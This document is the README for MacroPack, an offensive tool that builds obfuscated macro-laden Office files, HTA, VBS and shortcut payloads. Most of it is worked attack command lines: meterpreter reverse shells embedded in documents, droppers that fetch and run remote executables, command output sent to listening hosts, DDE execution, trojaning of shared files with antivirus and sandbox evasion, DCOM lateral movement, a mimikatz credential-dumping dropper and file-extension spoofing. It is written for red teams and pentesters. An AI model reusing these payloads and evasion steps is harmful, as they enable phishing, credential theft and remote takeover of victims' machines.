MacroPack Community is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. It also handles various shortcuts formats. This tool can be used for red teaming, pentests, demos, and social engineering assessments. MacroPack will simplify antimalware solutions bypass and automatize the process from vb source to final Office document or other payload type. It is very simple to use:
No configuration required
Everything can be done using a single line of code
Generation of majority of Office formats and VBS based formats
Payloads designed for advanced social engineering attacks (email, USB key, etc)
The tool is compatible with payloads generated by popular pentest tools (Metasploit, Empire, ...). It is also easy to combine with other tools as it is possible to read input from stdin and have a quiet output to another tool. T his tool is written in Python3 and works on both Linux and Windows platforms
Note: Windows platform with the right MS Office applications installed is required for Office documents automatic generation or trojan features.
The tool will use various obfuscation techniques, all automatic.
Obfuscation features are compatible with all VBA and VBS based format which can be generated by MacroPack.
Basic obfuscation (-o option) includes:
Renaming functions
Renaming variables
Removing spaces
Removing comments
Encoding Strings
MacroPack can generate several kinds of MS office documents and scripts formats. The format will be automatically guessed depending on the given file extension. File generation is done using the option --generate or -G.
MacroPack pro version also allows you to trojan existing Office files with option --trojan or -T.
Ms Office Supported formats are:
MS Word (.doc, .docm, .docx, .dotm)
MS Excel (.xls, .xlsm, .xslx, .xltm)
MS PowerPoint (.pptm, .potm)
MS Access (.accdb, .mdb)
MS Visio (.vsd,.vsdm)
MS Project (.mpp)
Scripting (txt) supported formats are:
VBA text file (.vba)
VBS text file (.vbs).
Windows Script File (.wsf)
Windows Script Components scriptlets (.wsc, .sct)
HTML Applications (.hta)
XSLT Stylesheet (.xsl) (Yes MS XSLT contains scripts ^^)
Shortcuts/Shell supported formats are:
Shell Link (.lnk)
Explorer Command File (.scf)
URL Shortcut (.url)
Groove Shortcuts (.glk)
Settings Shortcuts (.settingcontent-ms)
MS Library (.library-ms)
Setup Information (.inf)
Excel Web Query (.iqy)
Visual Studio Project (.csproj)
Command line (.cmd)
SYmbolic LinK (.slk) Pro version only
Compressed HTML Help (.chm) Pro version only
Note that all scripting and shortcuts formats (except LNK) can be generated on Linux version of MacroPack as well.
This software must be used only in the context of a Red Team engagement, penetration testing, phishing simulation,
security research, or other form of security assessments, with the lawful and formal authorization of the system owners.
Usage of this software for attacking targets without prior consent is forbidden and illegal.
It is the User’s responsibility to comply with all applicable local, state, federal and national laws.
We assume no liability and are not responsible for any misuse or damage that may be caused by using this software.
Not all capabilities and options of MacroPack are available on MacroPack Community.
Only the community version is available online.
Features of the pro version are truly "weaponizing" the process, hence their access is restricted to professionals.
The pro mode includes features such as:
Advance antimalware bypass
Advanced Shellcode injection methods
Command line obfuscation (Dosfuscation)
ASR and AMSI bypass
Self unpacking VBA/VBS payloads
Trojan existing MS Office documents, Help files and Visual Studio projects.
Embed decoy payload
Lateral movement using DCOM objects
Anti reverse engineering
Sandbox detection
Support of more formats such as Excel 4.0 SYLK and compiled help files
Run advanced VB payload from unusual formats
Weaponized templates and additional templates (ex EMPIRE, AUTOSHELLCODE)
Excel 4.0 macros (XLM)
And much more…
Some short demo videos are available on the BallisKit Vimeo channel.
Important: If you wish to contact me about MacroPack pro, use my emeric.nasi [at] sevagas.com email address. I will not answer anonymous inquiries for the Pro version but only professional emails.
Get the latest binary from https://github.com/sevagas/macro_pack/releases/
Download binary on PC with genuine Microsoft Office installed.
Open console, CD to binary dir and call the binary, simple as that!
macro_pack.exe --help
You need to be on a Windows machine to build MacroPack. Download and install dependencies:
git clone https://github.com/sevagas/macro_pack.gitcd macro_pack pip3 install -r requirements.txt
The tool is in python 3, so just start with your python3 install. ex:
python3 macro_pack.py --help# orpython macro_pack.py --help # if python3 is default install
If you want to produce a standalone exe using pyinstaller:
Install pyinstaller: pip install pyinstaller
Double-click on the "build.bat" script.
The resulted macro_pack.exe will be inside the bin directory.
List all supported file formats
macro_pack.exe --listformats
List all available templates
macro_pack.exe --listtemplates
Obfuscate the vba file generated by msfvenom and puts result in a new VBA file.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.5 -f vba | macro_pack.exe -o -G meterobf.vba
Obfuscate Empire stager VBA file and generate a MS Word document:
macro_pack.exe -f empire.vba -o -G myDoc.docm
Generate an MS Excel file containing an obfuscated dropper (download payload.exe and store as dropped.exe)
echo "https://myurl.url/payload.exe" "dropped.exe" | macro_pack.exe -o -t DROPPER -G "drop.xlsm"
Create a word 97 document containing an obfuscated VBA reverse meterpreter payload inside a share folder
msfvenom.bat -p windows/meterpreter/reverse_tcp LHOST=192.168.0.5 -f vba | macro_pack.exe -o -G REMOTE-PCSharemeter.doc
Download and execute Empire Launcher stager without powershell.exe by using DROPPER_PS template
# 1 Generate a file containing Empire lauchcher # 2 Make that file available on web server, ex with netcat:{ echo -ne "HTTP/1.0 200 OKrnrn"; cat empire_stager.cmd; } | nc -l -p 6666 -q1# 3 Use macro_pack to generate DROPPER_PS payload in Excel fileecho http://10.5.5.12:6543/empire_stager.cmd | macro_pack.exe -o -t DROPPER_PS -G join_the_empire.xls# 4 When executed on target, the macro will download PowerShdll, run it with rundll32, and download and execute stager.
Execute calc.exe via Dynamic Data Exchange (DDE) attack
echo calc.exe | macro_pack.exe --dde -G calc.xslx
Download and execute file via powershell using Dynamic Data Exchange (DDE) attack
# 1 Change the target file URL in resourcescommunityps_dl_exec.cmd# 2 Embed download execute cmd in documentmacro_pack.exe --dde -f ..resourcescommunityps_dl_exec.cmd -G DDE.xslx
Run command (notepad.exe) via Excel web query file and DDE
# 1 Create dde.dat file with next content=cmd|' /c notepad.exe'!A1# 2 Host dde.dat on webserver, ex. using macro_pack -l# 3 Generate .iqy filemacro_pack.exe -G dde.iqy
Generate obfuscated meterpreter reverse TCP VBS file and run it
# 1 Generate obfuscated VBS based on meterpreter template as well as Metasploit resource fileecho| macro_pack.exe -t METERPRETER -o -G meter.vbs # 2 On attacker machine Setup meterpreter listener msfconsole -r meterpreter.rc # 3 run VBS file with wscript (run 32bit wscript because meterpreter payload is 32bit)%windir%SysWoW64wscript meter.vbs
Generate obfuscated HTA file which executes "systeminfo" and returns result to another macro_pack listening on 192.168.0.5
# 1 Generate HTA file with REMOTE_CMD templateecho http://192.168.0.5:1234/a "systeminfo" | macro_pack.exe -t REMOTE_CMD -o -G info.hta # 2 On 192.168.0.5 open macro_pack as http listener macro_pack.exe -l . --port=1234# 3 run hta file with mshta mshta.exe full/path/to/info.hta
Generate url shortcut which executes a local HTA file when you click on it
echo "file://C:UsersusernameDesktophello.hta" | macro_pack.exe -G yop.url
Generate lnk shortcut which executes a cmd running calc.exe with calc.exe icon
echo '"c:WindowsSystem32cmd.exe /c calc.exe" "calc.exe"' | macro_pack.exe -G calc.lnk
Trojan the existing shared "report.xlsm" file with a dropper. Use anti-AV and anti-reverse features.
echo "http://10.5.5.12/drop.exe" "dropped.exe" | macro_pack.exe -o -t DROPPER --bypass --stealth --antisandox --trojan "E:accountingreport.xls"
Generate a Word file containing VBA self encoded x64 reverse meterpreter VBA payload (will bypass most AV). Keep-alive is needed because we need meterpreter to stay alive before we migrate.
msfvenom.bat -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.5 -f vba | macro_pack.exe -o --autopack --keep-alive -G out.docm
Trojan a PowerPoint file with a reverse raw shellcode. Macro is obfuscated and mangled to bypass AMSI and most antiviruses.
echo beacon.bin | macro_pack.exe -o -t SHELLCODE --bypass -T hotpics.pptm
Execute a macro on a remote PC using DCOM.
REM Step 1: Ensure you have enough rightsnet use 192.168.0.8c$ /user:domainusername passwordREM Step 2: Generate document, for example here, meterpreter reverse TCP Excel fileecho 192.168.0.5 4444 | macro_pack.exe -t METERPRETER -o -G meter.xlsmREM Step 3: Copy the document somewhere on remote sharecopy meter.xlsm "192.168.0.8c$usersusernamemeter.xlsm"REM Step 4: Execute!macro_pack.exe --dcom="192.168.0.8c$usersusernamemeter.xlsm"REM Step 2 to 4 in one step:echo 192.168.0.5 4444 | macro_pack.exe -t METERPRETER -o -G "192.168.0.8c$usersusernamemeter.xlsm" --dcom="192.168.0.8c$usersusernamemeter.xlsm"
Main payload generation options: -G, --generate=OUTPUT_FILE_PATH. Generates a file. Will guess the payload format based on extension. MacroPack supports most Ms Office and VB based payloads as well various kinds of shortcut files. Note: Office payload generation requires that MS Office application is installed on the machine --listformats View all file formats which can be generated by MacroPack -f, --input-file=INPUT_FILE_PATH A VBA macro file or file containing params for --template option or non VB formats If no input file is provided, input must be passed via stdin (using a pipe). -t, --template=TEMPLATE_NAME Use code template already included in MacroPack MacroPack supports multiple predefined templates useful for social engineering, redteaming, and security bypass --listtemplates View all templates provided by MacroPack -e, --embed=EMBEDDED_FILE_PATH Will embed the given file in the body of the generated document. Use with EMBED_EXE template to auto drop and exec the file or with EMBED_DLL to drop/load the embedded dll. Security bypass options: -o, --obfuscate Obfuscate code (remove spaces, obfuscate strings, obfuscate functions and variables name) --obfuscate-names-charset=Set a charset for obfuscated variables and functions Choose between: alpha, alphanum, complete or provide the list of char you want --obfuscate-names-minlen= Set min length of obfuscated variables and functions (default 8) --obfuscate-names-maxlen= Set max length of obfuscated variables and functions (default 20) --uac-bypass Execute payload with high privileges if user is admin. Compatible with most MacroPack templates Other options: -q, --quiet Do not display anything on screen, just process request. -p, --print Display result file on stdout (will display VBA for Office formats) Combine this option with -q option to pipe result into another program ex: cat input_file.vba | macro_pack.exe -o -G obfuscated.vba -q -p | another_app -s, --start-function=START_FUNCTION Entry point of macro file Note that macro_pack will automatically detect AutoOpen, Workbook_Open, or Document_Open as the start function --icon Path of generated file icon. Default is %windir%system32imageres.dll,67 --dde Dynamic Data Exchange attack mode. Input will be inserted as a cmd command and executed via DDE This option is only compatible with Excel formats. --run=FILE_PATH Open document using COM to run macro. Can be useful to bypass whitelisting situations. This will trigger AutoOpen/Workbook_Open automatically. If no auto start function, use --start-function option to indicate which macro to run. --unicode-rtlo=SPOOF_EXTENSION Inject the unicode U+202E char (Right-To-Left Override) to spoof the file extension when view in explorers. Ex. To generate an hta file with spoofed jpg extension use options: -G something.hta --unicode-rtlo=jpg In this case, windows or linux explorers will show the file named as: somethingath.jpg -l, --listen=ROOT_PATH Open an HTTP server from ROOT_PATH listening on default port 80. -w, --webdav-listen=ROOT_PATH Open a WebDAV server on default port 80, giving access to ROOT_PATH. --port=PORT Specify the listening port for HTTP and WebDAV servers. -h, --help Displays help and exit
Templates can be called using -t, --template=TEMPLATE_NAME combined with other options.
Here are all the available templates.
Just print a hello message and awareness about macro.
Give this template the name or email of the author:
-> Example: echo "@Author" | macro_pack.exe -t HELLO -G hello.pptm
Execute a command.
Give this template a command line
-> Example (pop calc.exe from and xslt file): echo "calc.exe" | macro_pack.exe -t CMD -G cmd.xsl
Execute a command line and send results to remote HTTP server.
Give this template the server url and the command to run:
-> Example: echo "http://192.168.0.5:7777" "dir /Q C:" | macro_pack.exe -t REMOTE_CMD -o -G cmd.doc
# Catch result with any webserver or netcatnc -l -p 7777
Download and execute a file.
Give this template the file url and the target file path
-> Example: echo
Download and execute Powershell script using rundll32 (to bypass blocked powershell.exe).
Note: This payload will download PowerShdll from Github.
Give this template the url of the powershell script you want to run:
-> Example: echo "
Download a DLL with another extension and run it using Office VBA.
-> Example, load meterpreter DLL using Office:
REM Generate meterpreter dll payloadmsfvenom.bat -p windows/meterpreter/reverse_tcp LHOST=192.168.0.5 -f dll -o meter.dllREM Make it available on webserver, ex using netcat on port 6666{ echo -ne "HTTP/1.0 200 OKrnrn"; cat meter.dll; } | nc -l -p 6666 -q1REM Create OFfice file which will download DLL and call itREM The DLL URL is http://192.168.0.5:6666/normal.html and it will be saved as .asd fileecho "http://192.168.0.5:6666/normal.html" Run | macro_pack.exe -t DROPPER_DLL -o -G meterdll.xls
Meterpreter reverse TCP template using MacroMeter by Cn33liz.
This template is CSharp meterpreter Stager build by Cn33liz and embedded within VBA using DotNetToJScript from James Forshaw.
Give this template the IP and PORT of listening mfsconsole:
-> Example: echo
This template also generates a meterpreter.rc file to create the Metasploit handler
-> Example: msfconsole -r meterpreter.rc
Drop and execute an embedded file.
Combine with --embed option, it will drop and execute the embedded file with random name under TEMP folder.
-> Example: macro_pack.exe -t EMBED_EXE --embed=c:windowssystem32calc.exe -o -G my_calc.vbs
Combine with --embed option, it will drop and call a function in the given DLL.
Give this template the name and parameters of function to call in DLL
-> Example1 : echo "main" | macro_pack.exe -t EMBED_DLL --embed=cmd.dll -o -G cmd.doc
-> Example2 : echo "main log privilege::debug sekurlsa::logonpasswords exit" | macro_pack.exe -t EMBED_DLL --embed=mimikatz.dll -o -G mimidropper.hta
The various features were tested against locally installed Antimalware solutions as well as online services. I ran multiple tests with several kinds of payloads and MacroPack features. A majority of antivirus static will be evaded by the simple "obfuscate" option. However, as most free tools, payloads are generally caught by behavioural analysis such as AMSI. Features available in MacroPack pro mode generally permit full AV bypass including AMSI.
Warning: Do not submit your samples to online scanners (ex VirusTotal), It's the best way to break your stealth macro. I also suggest you do not submit to non-reporting sites such as NoDistribute. You cannot be sure what these sites will do with the data you submit. If you have an issue with macro_pack AV detection, you can write to us for advice or submit an issue or pull request.
Blog posts about MacroPack Pro:
https://blog.sevagas.com/?Launch-shellcodes-and-bypass-Antivirus-using-MacroPack-Pro-VBA-payloads
https://blog.sevagas.com/?EXCEL-4-0-XLM-macro-in-MacroPack-Pro (Excel 4.0 payloads in MacroPack Pro)
https://blog.sevagas.com/?Advanced-MacroPack-payloads-XLM-Injection (XLM injection in MacroPack Pro)
Blog posts about hacking with MS Office, VBS, and other retro stuff security:
https://blog.sevagas.com/?Bypass-Windows-Defender-Attack-Surface-Reduction
https://subt0x11.blogspot.fr/2018/04/wmicexe-whitelisting-bypass-hacking.html
http://blog.sevagas.com/?My-VBA-Bot (write a full VBA RAT, includes how to bypass VBOM protection)
http://blog.sevagas.com/?Hacking-around-HTA-files (run hta code in non-hta files and hta polyglots)
https://sensepost.com/blog/2017/macro-less-code-exec-in-msword/ (About Dynamic Data Exchange attacks)
https://enigma0x3.net/2017/09/11/lateral-movement-using-excel-application-and-dcom/
Other useful links:
https://github.com/p3nt4/PowerShdll (Run PowerShell with dlls only)
https://gist.github.com/vivami/03780dd512fec22f3a2bae49f9023384 (Run powershell script with PowerShdll VBA implementation)
https://github.com/EmpireProject/Empire
https://medium.com/@vivami/phishing-between-the-app-whitelists-1b7dcdab4279
https://github.com/Cn33liz/MacroMeter
https://github.com/khr0x40sh/MacroShop
https://docs.microsoft.com/en-us/dotnet/standard/data/xml/xslt-stylesheet-scripting-using-msxsl-script
https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-exploit-guard/attack-surface-reduction-exploit-guard
Feel free to message me on my Twitter account @EmericNasi
Emails:
emeric.nasi[ at ]sevagas.com
ena.sevagas[ at ]protonmail.com
Important: If you wish to contact me about MacroPack pro, use my sevagas.com email address. Also please note that I will not answer anonymous inquiries for the Pro version, only professional emails.
The Apache License 2.0
Copyright 2017,2018,2019,2020,2021,2022 Emeric “Sio” Nasi (blog.sevagas.com)